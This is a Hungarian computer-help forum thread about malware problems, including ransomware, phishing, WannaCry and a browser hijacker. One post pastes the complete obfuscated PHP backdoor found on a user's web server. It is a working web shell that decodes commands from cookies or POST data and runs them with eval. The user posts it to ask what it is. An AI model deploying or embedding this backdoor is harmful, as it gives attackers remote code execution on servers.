Keresés

Részletes keresés

Wic Creative Commons License 2019.07.21 -2 1 1563

Szia, a file-ok visszanevezése nem fog segíteni.

Egy ransomware vírust kaptál ( STOP/djvu Ransomware egy újabb variánsa), ami titkosította az állományaidat. Ha nem volt róluk mentésed, valószínűleg keresztet vethetsz rájuk. Shadow copy be volt kapcsolva a gépeden? Mivel a vírus még valószínűleg  a gépeden van, inkább kérd szakember segítséget ebben az esetben, mert visszaállás után megint titkosítani fogja (bár az ilyen ransomware-k első dolga általában a shadow copy kikapcsolása).

 

Még akkor lehet szerencséd, ha ez egy régebbi ransomware, és már megvan hozzá a visszafejtő algoritmus a szükséges kulcsokkal.

 

 

https://www.bleepingcomputer.com/forums/t/701240/tocue-extension-file/

 

Itt talán kaphatsz tippet a helyreállításra:

https://www.bleepingcomputer.com/forums/t/671473/stop-ransomware-stop-puma-djvu-promo-drume-help-support-topic/

 

Ha van olyan állományod, ami nagyobb, mint 150KB, és  megvan az eredetije is, és a titkosított változata is, akkor talán sikerülhet a titkosító kulcsot kinyerni.

De ha vársz pár napot, akkor lehet, hogy erre az utóbbi oldalra fel fog kerülni a titkosító kulcs.

Szóval egyelőre inkább ne nyúlj hozzá a gépedhez csak úgy.

 

Előzmény: morcos csodagyerek (1562)
morcos csodagyerek Creative Commons License 2019.07.21 0 0 1562

Sziasztok! A segítségeteket kérem, mert olyan vírust kapott a számítógépem, ami az összes partíció összes állományának a nevéhez hozzácsapta még a .tocue kiterjesztést, így használhatatlanokká váltak. Aztán egy kedves .txt állományban még le is írta nekem, hogy kinek mennyi pénzt küldjek, hogy a feloldó programot megkapjam. Namost, annyira hülye azért nem vagyok, hogy fizessek, viszont annyi tengersok időm sincs, hogy egyenként visszanevezgessem a fájlokat a jobb kattintás/átnevezés és az utolsó kiterjesztés törlése módszerrel. Tehát valami olyan kis programra van szükségem, amely elvégzi ezt automatikusan, hogy adott helyek, partíciók összes mappájában az összes fájlt helyrehozza. Ha jól tudom, vannak is ilyen fájlátnevező programok ingyen, de én nem ismerek névleg egyet sem.  tudnátok mondani, ajánlani ilyet? Vagy megírhatok magam is ilyet könnyen és gyorsan windows kötegfájlban vagy valami ingyenes fejlesztőeszközben (SharpDevelop, CodeBlocks, stb.)? Ebben  tudnátok segíteni? Köszönöm.

dollerakos Creative Commons License 2018.10.25 0 0 1561

Illetve mégis a Double Commanderrel elő tudtam hozni a tartalmát, de itt már mindenféle krix-krax könyvtár- és fájlnevet találok, mintha konvertálódtak volna azok a bizonyos régi könyvtárak és fájlok. Inkább nem nyúlok hozzá, biztos megvan az értelme, hogy miért történtek így a dolgok. A lényeg, hogy a laptop szépen működik. Sorry, ha valakit zavartam a soraimmal. Üdv.

Előzmény: dollerakos (1560)
dollerakos Creative Commons License 2018.10.25 0 0 1560

Azt hiszem, visszavonulót fújok. Mintha megszűnt volna a probléma. Kb. másfél órán át ment ez a bizonyos cp, amíg a linuxos laptop totál használhatatlan volt. Majd egyszercsak abbahagyta a cp-zést, megszűnt a vinyó-tekerés és egy csapásra minden visszatért a régi kerékvágásba és a laptop használhatóvá vált. Azzal a különbséggel (amit egyébként nem értek, miért történt), hogy mint egy meghajtó, odakerült az asztalra egy, az e-mail-címemmel jelzett könyvtár. Megnyitottam és ősrégi cuccokat, képeket, meg egyebeket találtam benne. Aztán jobbklikk -> Leválasztás és azon nyomban eltűnt. Elő se tudom hozni, de nem is kell. Hogy ezt miért csinálta, nem tudom...

Előzmény: dollerakos (1559)
dollerakos Creative Commons License 2018.10.25 0 0 1559

Próbálok okosabb lenni, de nem nagyon megy.. Bekapcsoltam a linuxos gépet. Beütöttem a promtba a top parancsot és a következőket látom. Most a 19. percben vagyok és egyfolytában a cp van felül, 3 %-os CPU-val, magyarán az megy egyfolytában. Nem tudom, mi az S, de a CP-vel egy sorban D betű van. Az összes többi alkalmazásnál a D alatt S, I van, kivéve a top sorában, ahol R-et látok. A cp-ről ezt találtam:

 

https://www.computerhope.com/unix/ucp.htm

 

Miért csinál másolatokat a könyvtárakról és a fájlokról? És miért egyfolytában?

 

A cp alatt általában a kswapd0-t látom, de nekem az se mond sokat, ezt találtam róla:

 

https://askubuntu.com/questions/259739/kswapd0-is-taking-a-lot-of-cpu

Előzmény: NevemTeve (1558)
NevemTeve Creative Commons License 2018.10.25 0 0 1558

Azt nem tudom, hogy mi az a Rendszerfigyelő, de a 'top' már sokszor segített, pl. amikor a Firefox 'plugin container'-e ámokot futott.

Előzmény: dollerakos (1557)
dollerakos Creative Commons License 2018.10.24 0 0 1557

Ránéztem a Rendszerfigyelőre és nem jelzett semmit. Minden 0 %-on volt. Illetve csak akkor jelzett valamit, ha épp megnyitottam egy alkalmazást, de csak azt és pár %-on. Ha meg nagynehezen bezáródott, akkor ismét  minden 0 % volt. Tehát minden esetben kerregett a vinyó. Ezért is érthetetlen az egész.

Előzmény: NevemTeve (1556)
NevemTeve Creative Commons License 2018.10.24 0 0 1556

Ha nagyon pörög valamin a gép, érdemes a 'top' nevű programot látni, hogy lássuk, mely processzek falják legjobban a CPU-t.

Előzmény: dollerakos (1555)
dollerakos Creative Commons License 2018.10.24 0 0 1555

Üdvözletem!
Talán lehet, nem is jó helyen írok, de úgy érzem, muszáj valahova besuvasztanom ezt a pár mondatot... Linuxról van szó, az Ubuntu 18.4-esről. Ezt tettem fel pár hónapja, hogy majd könnyedén, gyorsan és kockázatmentesen tudjak netezni. Eleinte nem is volt vele nagy bajom, könnyen hozzá is szoktam, nem okozott gondot a Windows után. A prompt-ablakot soha nem is használtam, meg semmi Windows-emulátor, még Wine sem játszott. Csak tisztán az Ubuntu volt. Csak egy kisebb kellemetlenség árnyalta a képet, hogy ti. az egér néha leragadt, mármint nem maga az egér, hanem szoftveresen, azaz úgy tett, mintha le lenne ragadva a bal-gomb, amikor is az történt, hogy akárhova mentem a kurzorral, mindent kijelölt, de nagy bajt sosem okozott. Ekkor máshogy nem, csak úgy tudtam kiszállni a problémából, hogy újra indítottam a gépet. Kellemetlen, de ez van.. Erről van is a neten egy-két gondolat, ezért nem tulajdonítottam neki nagy jelentőséget, egye fene, nem tragédia, ha más is együtt él vele, nem nagy gond, ez a pár hónap alatt kb. 7-8 alkalommal fordult elő. Ami már viszont nagyon nem tetszett, az pár napja történt: mind a Dokumentumok, a Képek és a Letöltések könyvtárból egyszer csak minden az égvilágon letörlődött, de úgy, hogy ezek megmaradtak üres könyvtárnak. Csak azért nem kaptam agybajt, mert szerencsére minden doksimat el szoktam menteni egy külső drive-ra, ott mindenem naprakészen megvan, továbbá a legfontosabb dolgaimat még egy felhő-alkalmazásba is. Felöltött bennem, hogy talán én adtam ki valami rossz parancsot? De talán annyira mégsem, hogy 3 könyvtár tartalmát is letöröltem volna??? Ekkora farigó nem szoktam lenni. Ekkor még mindig nem fogtam gyanút... Aztán nemsokkal ezután elkezdett úgy viselkedni a gép, mint ami vírusos lett volna. Nem indultak el alkalmazások, aztán, amelyik elindult, kellett várni perceket, meg a leállítására is. A vinyó meg csak forog-kerreg. Mi ez, ha nem vírus??? A Windows csinált ilyesmit, amikor vírust kaptam... Azt mondják az okosok, Linuxon nem is lehet vírust kapni, ezért nem is telepítettem semmiféle vírusirtót. Most akkor hogy is van ez? Mit gondoltok, ez vírus egyáltalán? 

Törölt nick Creative Commons License 2018.04.21 0 0 1554
Mantis Screamer Creative Commons License 2017.10.01 0 0 1552

ezt kapom újabban ha használom a guglikeresőt_

 

Erről az oldalról

Rendszereink az Ön számítógépes hálózatából érkező, szokatlan forgalmat észleltek. Ez az oldal ellenőrzi, hogy valóban Ön küldi a kéréseket, és nem egy robot. Miért történt ez?

 

Elkezdtem a táblakvízt töltögetni de a hetediknél eluntam. Gond van a gépemmel ?

Törölt nick Creative Commons License 2017.09.26 0 0 1551

Obfuscált php backdoor. Valószínűleg valamelyik PHP vagy egyéb zero day vagy CVE-xxxxx sérülékenységet használja ki a backdoor telepítéséhez.

Frissíts mindent a legfrissebbre (PHP, oprendszer, sql ha van, portálrendszer, ha használsz ilyet (pl. wordpress és társai).

Az talán segít.

 

Előzmény: Maci65 (1550)
Maci65 Creative Commons License 2017.09.25 0 0 1550

Egy vírus állandóan feltöltődik webszerverre. Ez a tartalma.Tud valaki támpontot adni esetleg, mit jelent a tartalma, és miként kerülhet ilyen fel csak úgy?

 

<?php ${"x47x4cx4fBx41x4cx53"}['rdf0e4d'] = "x5cx5fx75x71x59x63x4ex46x51x43x2bx54x78x38x2cx26x3bx2dx2ax7ex55x6ex3dx7cx57x66x70x74x42x5dx6dxax61x27x50x20x36x48x35x47x2ex3ax28x24x53x69x64x4bx6fx7bx76x49x79x31x3cx4fx23x41x62x34x3ex9x22x7ax6bx67x39x77x65x2fx5axdx6ax40x4cx58x68x21x29x6cx30x52x33x45x3fx37x5ex5bx4dx60x73x25x72x56x44x32x7dx4a"; $GLOBALS[$GLOBALS['rdf0e4d'][72].$GLOBALS['rdf0e4d'][80].$GLOBALS['rdf0e4d'][82].$GLOBALS['rdf0e4d'][80]] = $GLOBALS['rdf0e4d'][5].$GLOBALS['rdf0e4d'][76].$GLOBALS['rdf0e4d'][92]; $GLOBALS[$GLOBALS['rdf0e4d'][76].$GLOBALS['rdf0e4d'][66].$GLOBALS['rdf0e4d'][66].$GLOBALS['rdf0e4d'][95].$GLOBALS['rdf0e4d'][53].$GLOBALS['rdf0e4d'][68].$GLOBALS['rdf0e4d'][46]] = $GLOBALS['rdf0e4d'][48].$GLOBALS['rdf0e4d'][92].$GLOBALS['rdf0e4d'][46]; $GLOBALS[$GLOBALS['rdf0e4d'][27].$GLOBALS['rdf0e4d'][32].$GLOBALS['rdf0e4d'][95].$GLOBALS['rdf0e4d'][5].$GLOBALS['rdf0e4d'][25]] = $GLOBALS['rdf0e4d'][90].$GLOBALS['rdf0e4d'][27].$GLOBALS['rdf0e4d'][92].$GLOBALS['rdf0e4d'][79].$GLOBALS['rdf0e4d'][68].$GLOBALS['rdf0e4d'][21]; $GLOBALS[$GLOBALS['rdf0e4d'][30].$GLOBALS['rdf0e4d'][36].$GLOBALS['rdf0e4d'][32].$GLOBALS['rdf0e4d'][36].$GLOBALS['rdf0e4d'][38].$GLOBALS['rdf0e4d'][95].$GLOBALS['rdf0e4d'][53]] = $GLOBALS['rdf0e4d'][45].$GLOBALS['rdf0e4d'][21].$GLOBALS['rdf0e4d'][45].$GLOBALS['rdf0e4d'][1].$GLOBALS['rdf0e4d'][90].$GLOBALS['rdf0e4d'][68].$GLOBALS['rdf0e4d'][27]; $GLOBALS[$GLOBALS['rdf0e4d'][27].$GLOBALS['rdf0e4d'][38].$GLOBALS['rdf0e4d'][32].$GLOBALS['rdf0e4d'][66].$GLOBALS['rdf0e4d'][82]] = $GLOBALS['rdf0e4d'][90].$GLOBALS['rdf0e4d'][68].$GLOBALS['rdf0e4d'][92].$GLOBALS['rdf0e4d'][45].$GLOBALS['rdf0e4d'][32].$GLOBALS['rdf0e4d'][79].$GLOBALS['rdf0e4d'][45].$GLOBALS['rdf0e4d'][63].$GLOBALS['rdf0e4d'][68]; $GLOBALS[$GLOBALS['rdf0e4d'][58].$GLOBALS['rdf0e4d'][13].$GLOBALS['rdf0e4d'][46].$GLOBALS['rdf0e4d'][25].$GLOBALS['rdf0e4d'][95].$GLOBALS['rdf0e4d'][59].$GLOBALS['rdf0e4d'][82].$GLOBALS['rdf0e4d'][53]] = $GLOBALS['rdf0e4d'][26].$GLOBALS['rdf0e4d'][76].$GLOBALS['rdf0e4d'][26].$GLOBALS['rdf0e4d'][50].$GLOBALS['rdf0e4d'][68].$GLOBALS['rdf0e4d'][92].$GLOBALS['rdf0e4d'][90].$GLOBALS['rdf0e4d'][45].$GLOBALS['rdf0e4d'][48].$GLOBALS['rdf0e4d'][21]; $GLOBALS[$GLOBALS['rdf0e4d'][3].$GLOBALS['rdf0e4d'][80].$GLOBALS['rdf0e4d'][68].$GLOBALS['rdf0e4d'][95].$GLOBALS['rdf0e4d'][82].$GLOBALS['rdf0e4d'][85].$GLOBALS['rdf0e4d'][13]] = $GLOBALS['rdf0e4d'][2].$GLOBALS['rdf0e4d'][21].$GLOBALS['rdf0e4d'][90].$GLOBALS['rdf0e4d'][68].$GLOBALS['rdf0e4d'][92].$GLOBALS['rdf0e4d'][45].$GLOBALS['rdf0e4d'][32].$GLOBALS['rdf0e4d'][79].$GLOBALS['rdf0e4d'][45].$GLOBALS['rdf0e4d'][63].$GLOBALS['rdf0e4d'][68]; $GLOBALS[$GLOBALS['rdf0e4d'][52].$GLOBALS['rdf0e4d'][36].$GLOBALS['rdf0e4d'][38].$GLOBALS['rdf0e4d'][95].$GLOBALS['rdf0e4d'][38].$GLOBALS['rdf0e4d'][95]] = $GLOBALS['rdf0e4d'][58].$GLOBALS['rdf0e4d'][32].$GLOBALS['rdf0e4d'][90].$GLOBALS['rdf0e4d'][68].$GLOBALS['rdf0e4d'][36].$GLOBALS['rdf0e4d'][59].$GLOBALS['rdf0e4d'][1].$GLOBALS['rdf0e4d'][46].$GLOBALS['rdf0e4d'][68].$GLOBALS['rdf0e4d'][5].$GLOBALS['rdf0e4d'][48].$GLOBALS['rdf0e4d'][46].$GLOBALS['rdf0e4d'][68]; $GLOBALS[$GLOBALS['rdf0e4d'][48].$GLOBALS['rdf0e4d'][13].$GLOBALS['rdf0e4d'][66].$GLOBALS['rdf0e4d'][46]] = $GLOBALS['rdf0e4d'][90].$GLOBALS['rdf0e4d'][68].$GLOBALS['rdf0e4d'][27].$GLOBALS['rdf0e4d'][1].$GLOBALS['rdf0e4d'][27].$GLOBALS['rdf0e4d'][45].$GLOBALS['rdf0e4d'][30].$GLOBALS['rdf0e4d'][68].$GLOBALS['rdf0e4d'][1].$GLOBALS['rdf0e4d'][79].$GLOBALS['rdf0e4d'][45].$GLOBALS['rdf0e4d'][30].$GLOBALS['rdf0e4d'][45].$GLOBALS['rdf0e4d'][27]; $GLOBALS[$GLOBALS['rdf0e4d'][90].$GLOBALS['rdf0e4d'][58].$GLOBALS['rdf0e4d'][38].$GLOBALS['rdf0e4d'][66].$GLOBALS['rdf0e4d'][32]] = $GLOBALS['rdf0e4d'][30].$GLOBALS['rdf0e4d'][36].$GLOBALS['rdf0e4d'][38].$GLOBALS['rdf0e4d'][5].$GLOBALS['rdf0e4d'][82].$GLOBALS['rdf0e4d'][68]; $GLOBALS[$GLOBALS['rdf0e4d'][25].$GLOBALS['rdf0e4d'][25].$GLOBALS['rdf0e4d'][58].$GLOBALS['rdf0e4d'][13].$GLOBALS['rdf0e4d'][5].$GLOBALS['rdf0e4d'][59]] = $GLOBALS['rdf0e4d'][21].$GLOBALS['rdf0e4d'][32].$GLOBALS['rdf0e4d'][68].$GLOBALS['rdf0e4d'][59].$GLOBALS['rdf0e4d'][13].$GLOBALS['rdf0e4d'][68].$GLOBALS['rdf0e4d'][36].$GLOBALS['rdf0e4d'][59]; $GLOBALS[$GLOBALS['rdf0e4d'][12].$GLOBALS['rdf0e4d'][59].$GLOBALS['rdf0e4d'][68].$GLOBALS['rdf0e4d'][68].$GLOBALS['rdf0e4d'][68].$GLOBALS['rdf0e4d'][80]] = $_POST; $GLOBALS[$GLOBALS['rdf0e4d'][58].$GLOBALS['rdf0e4d'][36].$GLOBALS['rdf0e4d'][32].$GLOBALS['rdf0e4d'][82].$GLOBALS['rdf0e4d'][53].$GLOBALS['rdf0e4d'][53]] = $_COOKIE; @$GLOBALS[$GLOBALS['rdf0e4d'][30].$GLOBALS['rdf0e4d'][36].$GLOBALS['rdf0e4d'][32].$GLOBALS['rdf0e4d'][36].$GLOBALS['rdf0e4d'][38].$GLOBALS['rdf0e4d'][95].$GLOBALS['rdf0e4d'][53]]($GLOBALS['rdf0e4d'][68].$GLOBALS['rdf0e4d'][92].$GLOBALS['rdf0e4d'][92].$GLOBALS['rdf0e4d'][48].$GLOBALS['rdf0e4d'][92].$GLOBALS['rdf0e4d'][1].$GLOBALS['rdf0e4d'][79].$GLOBALS['rdf0e4d'][48].$GLOBALS['rdf0e4d'][65], NULL); @$GLOBALS[$GLOBALS['rdf0e4d'][30].$GLOBALS['rdf0e4d'][36].$GLOBALS['rdf0e4d'][32].$GLOBALS['rdf0e4d'][36].$GLOBALS['rdf0e4d'][38].$GLOBALS['rdf0e4d'][95].$GLOBALS['rdf0e4d'][53]]($GLOBALS['rdf0e4d'][79].$GLOBALS['rdf0e4d'][48].$GLOBALS['rdf0e4d'][65].$GLOBALS['rdf0e4d'][1].$GLOBALS['rdf0e4d'][68].$GLOBALS['rdf0e4d'][92].$GLOBALS['rdf0e4d'][92].$GLOBALS['rdf0e4d'][48].$GLOBALS['rdf0e4d'][92].$GLOBALS['rdf0e4d'][90], 0); @$GLOBALS[$GLOBALS['rdf0e4d'][30].$GLOBALS['rdf0e4d'][36].$GLOBALS['rdf0e4d'][32].$GLOBALS['rdf0e4d'][36].$GLOBALS['rdf0e4d'][38].$GLOBALS['rdf0e4d'][95].$GLOBALS['rdf0e4d'][53]]($GLOBALS['rdf0e4d'][30].$GLOBALS['rdf0e4d'][32].$GLOBALS['rdf0e4d'][12].$GLOBALS['rdf0e4d'][1].$GLOBALS['rdf0e4d'][68].$GLOBALS['rdf0e4d'][12].$GLOBALS['rdf0e4d'][68].$GLOBALS['rdf0e4d'][5].$GLOBALS['rdf0e4d'][2].$GLOBALS['rdf0e4d'][27].$GLOBALS['rdf0e4d'][45].$GLOBALS['rdf0e4d'][48].$GLOBALS['rdf0e4d'][21].$GLOBALS['rdf0e4d'][1].$GLOBALS['rdf0e4d'][27].$GLOBALS['rdf0e4d'][45].$GLOBALS['rdf0e4d'][30].$GLOBALS['rdf0e4d'][68], 0); @$GLOBALS[$GLOBALS['rdf0e4d'][48].$GLOBALS['rdf0e4d'][13].$GLOBALS['rdf0e4d'][66].$GLOBALS['rdf0e4d'][46]](0); $x8ee = NULL; $tfa9e3db = NULL; $GLOBALS[$GLOBALS['rdf0e4d'][65].$GLOBALS['rdf0e4d'][58].$GLOBALS['rdf0e4d'][82].$GLOBALS['rdf0e4d'][66].$GLOBALS['rdf0e4d'][82].$GLOBALS['rdf0e4d'][95].$GLOBALS['rdf0e4d'][25].$GLOBALS['rdf0e4d'][80]] = $GLOBALS['rdf0e4d'][58].$GLOBALS['rdf0e4d'][53].$GLOBALS['rdf0e4d'][25].$GLOBALS['rdf0e4d'][59].$GLOBALS['rdf0e4d'][58].$GLOBALS['rdf0e4d'][68].$GLOBALS['rdf0e4d'][85].$GLOBALS['rdf0e4d'][82].$GLOBALS['rdf0e4d'][17].$GLOBALS['rdf0e4d'][13].$GLOBALS['rdf0e4d'][59].$GLOBALS['rdf0e4d'][82].$GLOBALS['rdf0e4d'][68].$GLOBALS['rdf0e4d'][17].$GLOBALS['rdf0e4d'][59].$GLOBALS['rdf0e4d'][59].$GLOBALS['rdf0e4d'][46].$GLOBALS['rdf0e4d'][13].$GLOBALS['rdf0e4d'][17].$GLOBALS['rdf0e4d'][66].$GLOBALS['rdf0e4d'][66].$GLOBALS['rdf0e4d'][5].$GLOBALS['rdf0e4d'][66].$GLOBALS['rdf0e4d'][17].$GLOBALS['rdf0e4d'][85].$GLOBALS['rdf0e4d'][32].$GLOBALS['rdf0e4d'][5].$GLOBALS['rdf0e4d'][38].$GLOBALS['rdf0e4d'][53].$GLOBALS['rdf0e4d'][53].$GLOBALS['rdf0e4d'][59].$GLOBALS['rdf0e4d'][36].$GLOBALS['rdf0e4d'][32].$GLOBALS['rdf0e4d'][59].$GLOBALS['rdf0e4d'][5].$GLOBALS['rdf0e4d'][32]; global $gb3932f0; function nae48e64($x8ee, $s020) {     $n19c = "";     for ($odb4c=0; $odb4c<$GLOBALS[$GLOBALS['rdf0e4d'][27].$GLOBALS['rdf0e4d'][32].$GLOBALS['rdf0e4d'][95].$GLOBALS['rdf0e4d'][5].$GLOBALS['rdf0e4d'][25]]($x8ee);)     {         for ($h3fd2=0; $h3fd2<$GLOBALS[$GLOBALS['rdf0e4d'][27].$GLOBALS['rdf0e4d'][32].$GLOBALS['rdf0e4d'][95].$GLOBALS['rdf0e4d'][5].$GLOBALS['rdf0e4d'][25]]($s020) && $odb4c<$GLOBALS[$GLOBALS['rdf0e4d'][27].$GLOBALS['rdf0e4d'][32].$GLOBALS['rdf0e4d'][95].$GLOBALS['rdf0e4d'][5].$GLOBALS['rdf0e4d'][25]]($x8ee); $h3fd2++, $odb4c++)         {             $n19c .= $GLOBALS[$GLOBALS['rdf0e4d'][72].$GLOBALS['rdf0e4d'][80].$GLOBALS['rdf0e4d'][82].$GLOBALS['rdf0e4d'][80]]($GLOBALS[$GLOBALS['rdf0e4d'][76].$GLOBALS['rdf0e4d'][66].$GLOBALS['rdf0e4d'][66].$GLOBALS['rdf0e4d'][95].$GLOBALS['rdf0e4d'][53].$GLOBALS['rdf0e4d'][68].$GLOBALS['rdf0e4d'][46]]($x8ee[$odb4c]) ^ $GLOBALS[$GLOBALS['rdf0e4d'][76].$GLOBALS['rdf0e4d'][66].$GLOBALS['rdf0e4d'][66].$GLOBALS['rdf0e4d'][95].$GLOBALS['rdf0e4d'][53].$GLOBALS['rdf0e4d'][68].$GLOBALS['rdf0e4d'][46]]($s020[$h3fd2]));         }     }     return $n19c; } function m65c3e($x8ee, $s020) {     global $gb3932f0;     return $GLOBALS[$GLOBALS['rdf0e4d'][25].$GLOBALS['rdf0e4d'][25].$GLOBALS['rdf0e4d'][58].$GLOBALS['rdf0e4d'][13].$GLOBALS['rdf0e4d'][5].$GLOBALS['rdf0e4d'][59]]($GLOBALS[$GLOBALS['rdf0e4d'][25].$GLOBALS['rdf0e4d'][25].$GLOBALS['rdf0e4d'][58].$GLOBALS['rdf0e4d'][13].$GLOBALS['rdf0e4d'][5].$GLOBALS['rdf0e4d'][59]]($x8ee, $gb3932f0), $s020); } foreach ($GLOBALS[$GLOBALS['rdf0e4d'][58].$GLOBALS['rdf0e4d'][36].$GLOBALS['rdf0e4d'][32].$GLOBALS['rdf0e4d'][82].$GLOBALS['rdf0e4d'][53].$GLOBALS['rdf0e4d'][53]] as $s020=>$kb2cd6571) {     $x8ee = $kb2cd6571;     $tfa9e3db = $s020; } if (!$x8ee) {     foreach ($GLOBALS[$GLOBALS['rdf0e4d'][12].$GLOBALS['rdf0e4d'][59].$GLOBALS['rdf0e4d'][68].$GLOBALS['rdf0e4d'][68].$GLOBALS['rdf0e4d'][68].$GLOBALS['rdf0e4d'][80]] as $s020=>$kb2cd6571)     {         $x8ee = $kb2cd6571;         $tfa9e3db = $s020;     } } $x8ee = @$GLOBALS[$GLOBALS['rdf0e4d'][3].$GLOBALS['rdf0e4d'][80].$GLOBALS['rdf0e4d'][68].$GLOBALS['rdf0e4d'][95].$GLOBALS['rdf0e4d'][82].$GLOBALS['rdf0e4d'][85].$GLOBALS['rdf0e4d'][13]]($GLOBALS[$GLOBALS['rdf0e4d'][90].$GLOBALS['rdf0e4d'][58].$GLOBALS['rdf0e4d'][38].$GLOBALS['rdf0e4d'][66].$GLOBALS['rdf0e4d'][32]]($GLOBALS[$GLOBALS['rdf0e4d'][52].$GLOBALS['rdf0e4d'][36].$GLOBALS['rdf0e4d'][38].$GLOBALS['rdf0e4d'][95].$GLOBALS['rdf0e4d'][38].$GLOBALS['rdf0e4d'][95]]($x8ee), $tfa9e3db)); if (isset($x8ee[$GLOBALS['rdf0e4d'][32].$GLOBALS['rdf0e4d'][64]]) && $gb3932f0==$x8ee[$GLOBALS['rdf0e4d'][32].$GLOBALS['rdf0e4d'][64]]) {     if ($x8ee[$GLOBALS['rdf0e4d'][32]] == $GLOBALS['rdf0e4d'][45])     {         $odb4c = Array(             $GLOBALS['rdf0e4d'][26].$GLOBALS['rdf0e4d'][50] => @$GLOBALS[$GLOBALS['rdf0e4d'][58].$GLOBALS['rdf0e4d'][13].$GLOBALS['rdf0e4d'][46].$GLOBALS['rdf0e4d'][25].$GLOBALS['rdf0e4d'][95].$GLOBALS['rdf0e4d'][59].$GLOBALS['rdf0e4d'][82].$GLOBALS['rdf0e4d'][53]](),             $GLOBALS['rdf0e4d'][90].$GLOBALS['rdf0e4d'][50] => $GLOBALS['rdf0e4d'][53].$GLOBALS['rdf0e4d'][40].$GLOBALS['rdf0e4d'][80].$GLOBALS['rdf0e4d'][17].$GLOBALS['rdf0e4d'][53],         );         echo @$GLOBALS[$GLOBALS['rdf0e4d'][27].$GLOBALS['rdf0e4d'][38].$GLOBALS['rdf0e4d'][32].$GLOBALS['rdf0e4d'][66].$GLOBALS['rdf0e4d'][82]]($odb4c);     }     elseif ($x8ee[$GLOBALS['rdf0e4d'][32]] == $GLOBALS['rdf0e4d'][68])     {         eval($x8ee[$GLOBALS['rdf0e4d'][46]]);     }     exit(); }

Törölt nick Creative Commons License 2017.08.05 0 0 1549

Ha a programban titkosított módon van tárolva a weboldal címe, akkor nem olyan könnyű kinyerni.

 

Előzmény: heydriz (1548)
heydriz Creative Commons License 2017.08.05 0 0 1548

De te pl olyan vészkapcsolót tennél bele, amit bárki le tud állítani rajtad kívül?

Úgy értem, egy oldal címe azért eléggé feltűnő egy kódban. Így meg, hogy nem volt bejegyezve, meg egyszerűen nevetséges hiba lenne.. Bárhol máshol is elrejthetett volna egy vészkapcsolót.

Törölt nick Creative Commons License 2017.08.04 0 0 1547

A cikkek szerint az alkotó tette bele ezt a vészkapcsolót. Csak nem dugta el rendesen, így megtalálták a kódban, és így le tudták állítani a terjedést.

 

Előzmény: heydriz (1546)
heydriz Creative Commons License 2017.08.04 0 0 1546

Sziasztok,

kicsit off talán. Ransomware téma, azonbelül wannacry.

Nem értem, hogy miért volt benne az a bizonyos hosszú internetes cím, ami ráadásul nem volt bejegyezve? Ez nem lehet egy véletlen hiba. És, hogy a bejegyzés után mintegy varázsütésre leáll a terjedése.

Ki tud részleteket erről?

hgabi84 Creative Commons License 2017.06.30 0 0 1545

Üdv.!

 

Én a Windows fájljait nem bántanám. Ha már notepad, akkor ne úgy csináld, hanem így - és ez hatásos is.

Előzmény: Törölt nick (1544)
Törölt nick Creative Commons License 2017.06.30 0 0 1544

Hali

a notepad atnevezese mennyire hatasos ?

mondjuk nekem ezt dobta ki 

Törölt nick Creative Commons License 2017.05.29 0 0 1543

Na, a virustotal szerint a levélben szereplő linken adathalász oldal van.

Előzmény: Törölt nick (1542)
Törölt nick Creative Commons License 2017.05.29 0 0 1542

Új adathalász vagy vírusos levél a láthatáron.

 

feladó: noreply@t-online.hu

tárgy: Számlaértesítő.

 

Ilyen szöveg van benne, ékes magyarsággal:

 

Kérjük, hogy most vége előtt a megadott időszakban annak érdekében, hogy az előfizetés mindig velünk

Most, a megtakarítás a kártya számát és a számla rendezésére biztonságosan.

Kövesse az alábbi linket, hogy valóra

 

És egy link, amire ne kattintsatok rá.

 

 

Törölt nick Creative Commons License 2017.05.27 0 0 1541

Tedd fel a Microsof Security Essentials-t.

Azt valószínűleg engedni fogja.

Előzmény: Dandondan (1540)
Dandondan Creative Commons License 2017.05.27 0 0 1540

Megfogadtam tanácsotok, és kerestem másik programot. Viszont, egy olyan lukra futottam most rá, hogy a win10-en nem engedi telepíteni, ugyan is lekerült a megbízható gyártók igazolása, és nem engedi telepíteni. Többet is próbáltam, és mindre ezt dobja fel!

 

Valakinek egy ötlet? :)

Előzmény: hgabi84 (1539)
hgabi84 Creative Commons License 2017.05.27 0 0 1539

Üdv.!

 

Próbálj speciális keresőket - pl.: Trojan Remover és GMER.

 

Továbbá a jelenlegi vírusirtó helyett feltétlenül olyat válassz, ami a hivatalos tesztlaborok eredményei között kimagasló eredményekkel tűnik ki - például a Bitdefender. Ehhez egy kis segítség.

 

Sok sikert!

Előzmény: Dandondan (1533)
Amy An Creative Commons License 2017.05.27 0 0 1538


Miért nem próbálkozol másikat?
Számos egyéb eszköz létezik.

Kaspersky, Avira AntiVir Personal, SpyHunter Microsoft Security Essentials...

 

http://www.pcmag.com/article2/0,2817,2372364,00.asp

Törölt nick Creative Commons License 2017.05.25 0 0 1537

Mondjuk ezt az IObit-et nem látom a csúcsszuper víruskergetők között, a Virustotal mintha nem is jegyezné...

Előzmény: Dandondan (1535)
Törölt nick Creative Commons License 2017.05.25 0 0 1536

Egy próbát megér, szerintem igen.

Előzmény: Dandondan (1535)
Dandondan Creative Commons License 2017.05.25 0 0 1535

Szerinted az Avast-ot fel lehet telepíteni a iObit mellé?

Előzmény: Törölt nick (1534)
Törölt nick Creative Commons License 2017.05.25 0 0 1534

Esetleg Avast-tal egy boot idejű keresés.

Előzmény: Dandondan (1533)
Dandondan Creative Commons License 2017.05.25 0 0 1533

Sziasztok!

 

Segítségeteket szeretném kérni, mert van egy vírusom/trójaim, amitől nem tudok megszabadulni!

Win 10-et használok, és mellette Advanced SystemCare, és iObit malware fighter pro-m van fent, és úgy tűnik nem boldogulnak a feladattal! Legfrissebb vírus adatbázis, ami meg is találja a fenyegetéseket, de akárhányszor törli/karanténba teszi... Valahogy visszajön! Böngészős vírusról van szó: initialsite123 a neve. Ráadásul, elég sok mindent átvariált, de a legtöbbet el tudtam távolítani. Viszont, a procimat folyamatosan pörgeti 30-40%-on, és lassít mindent. Már próbáltam csökkentett üzemmódban. Töröltem fileokat, de már nem tudom mi tévő legyek!

 

Köszönöm előre is megtisztelő válaszotokat!

Ha kedveled azért, ha nem azért nyomj egy lájkot a Fórumért!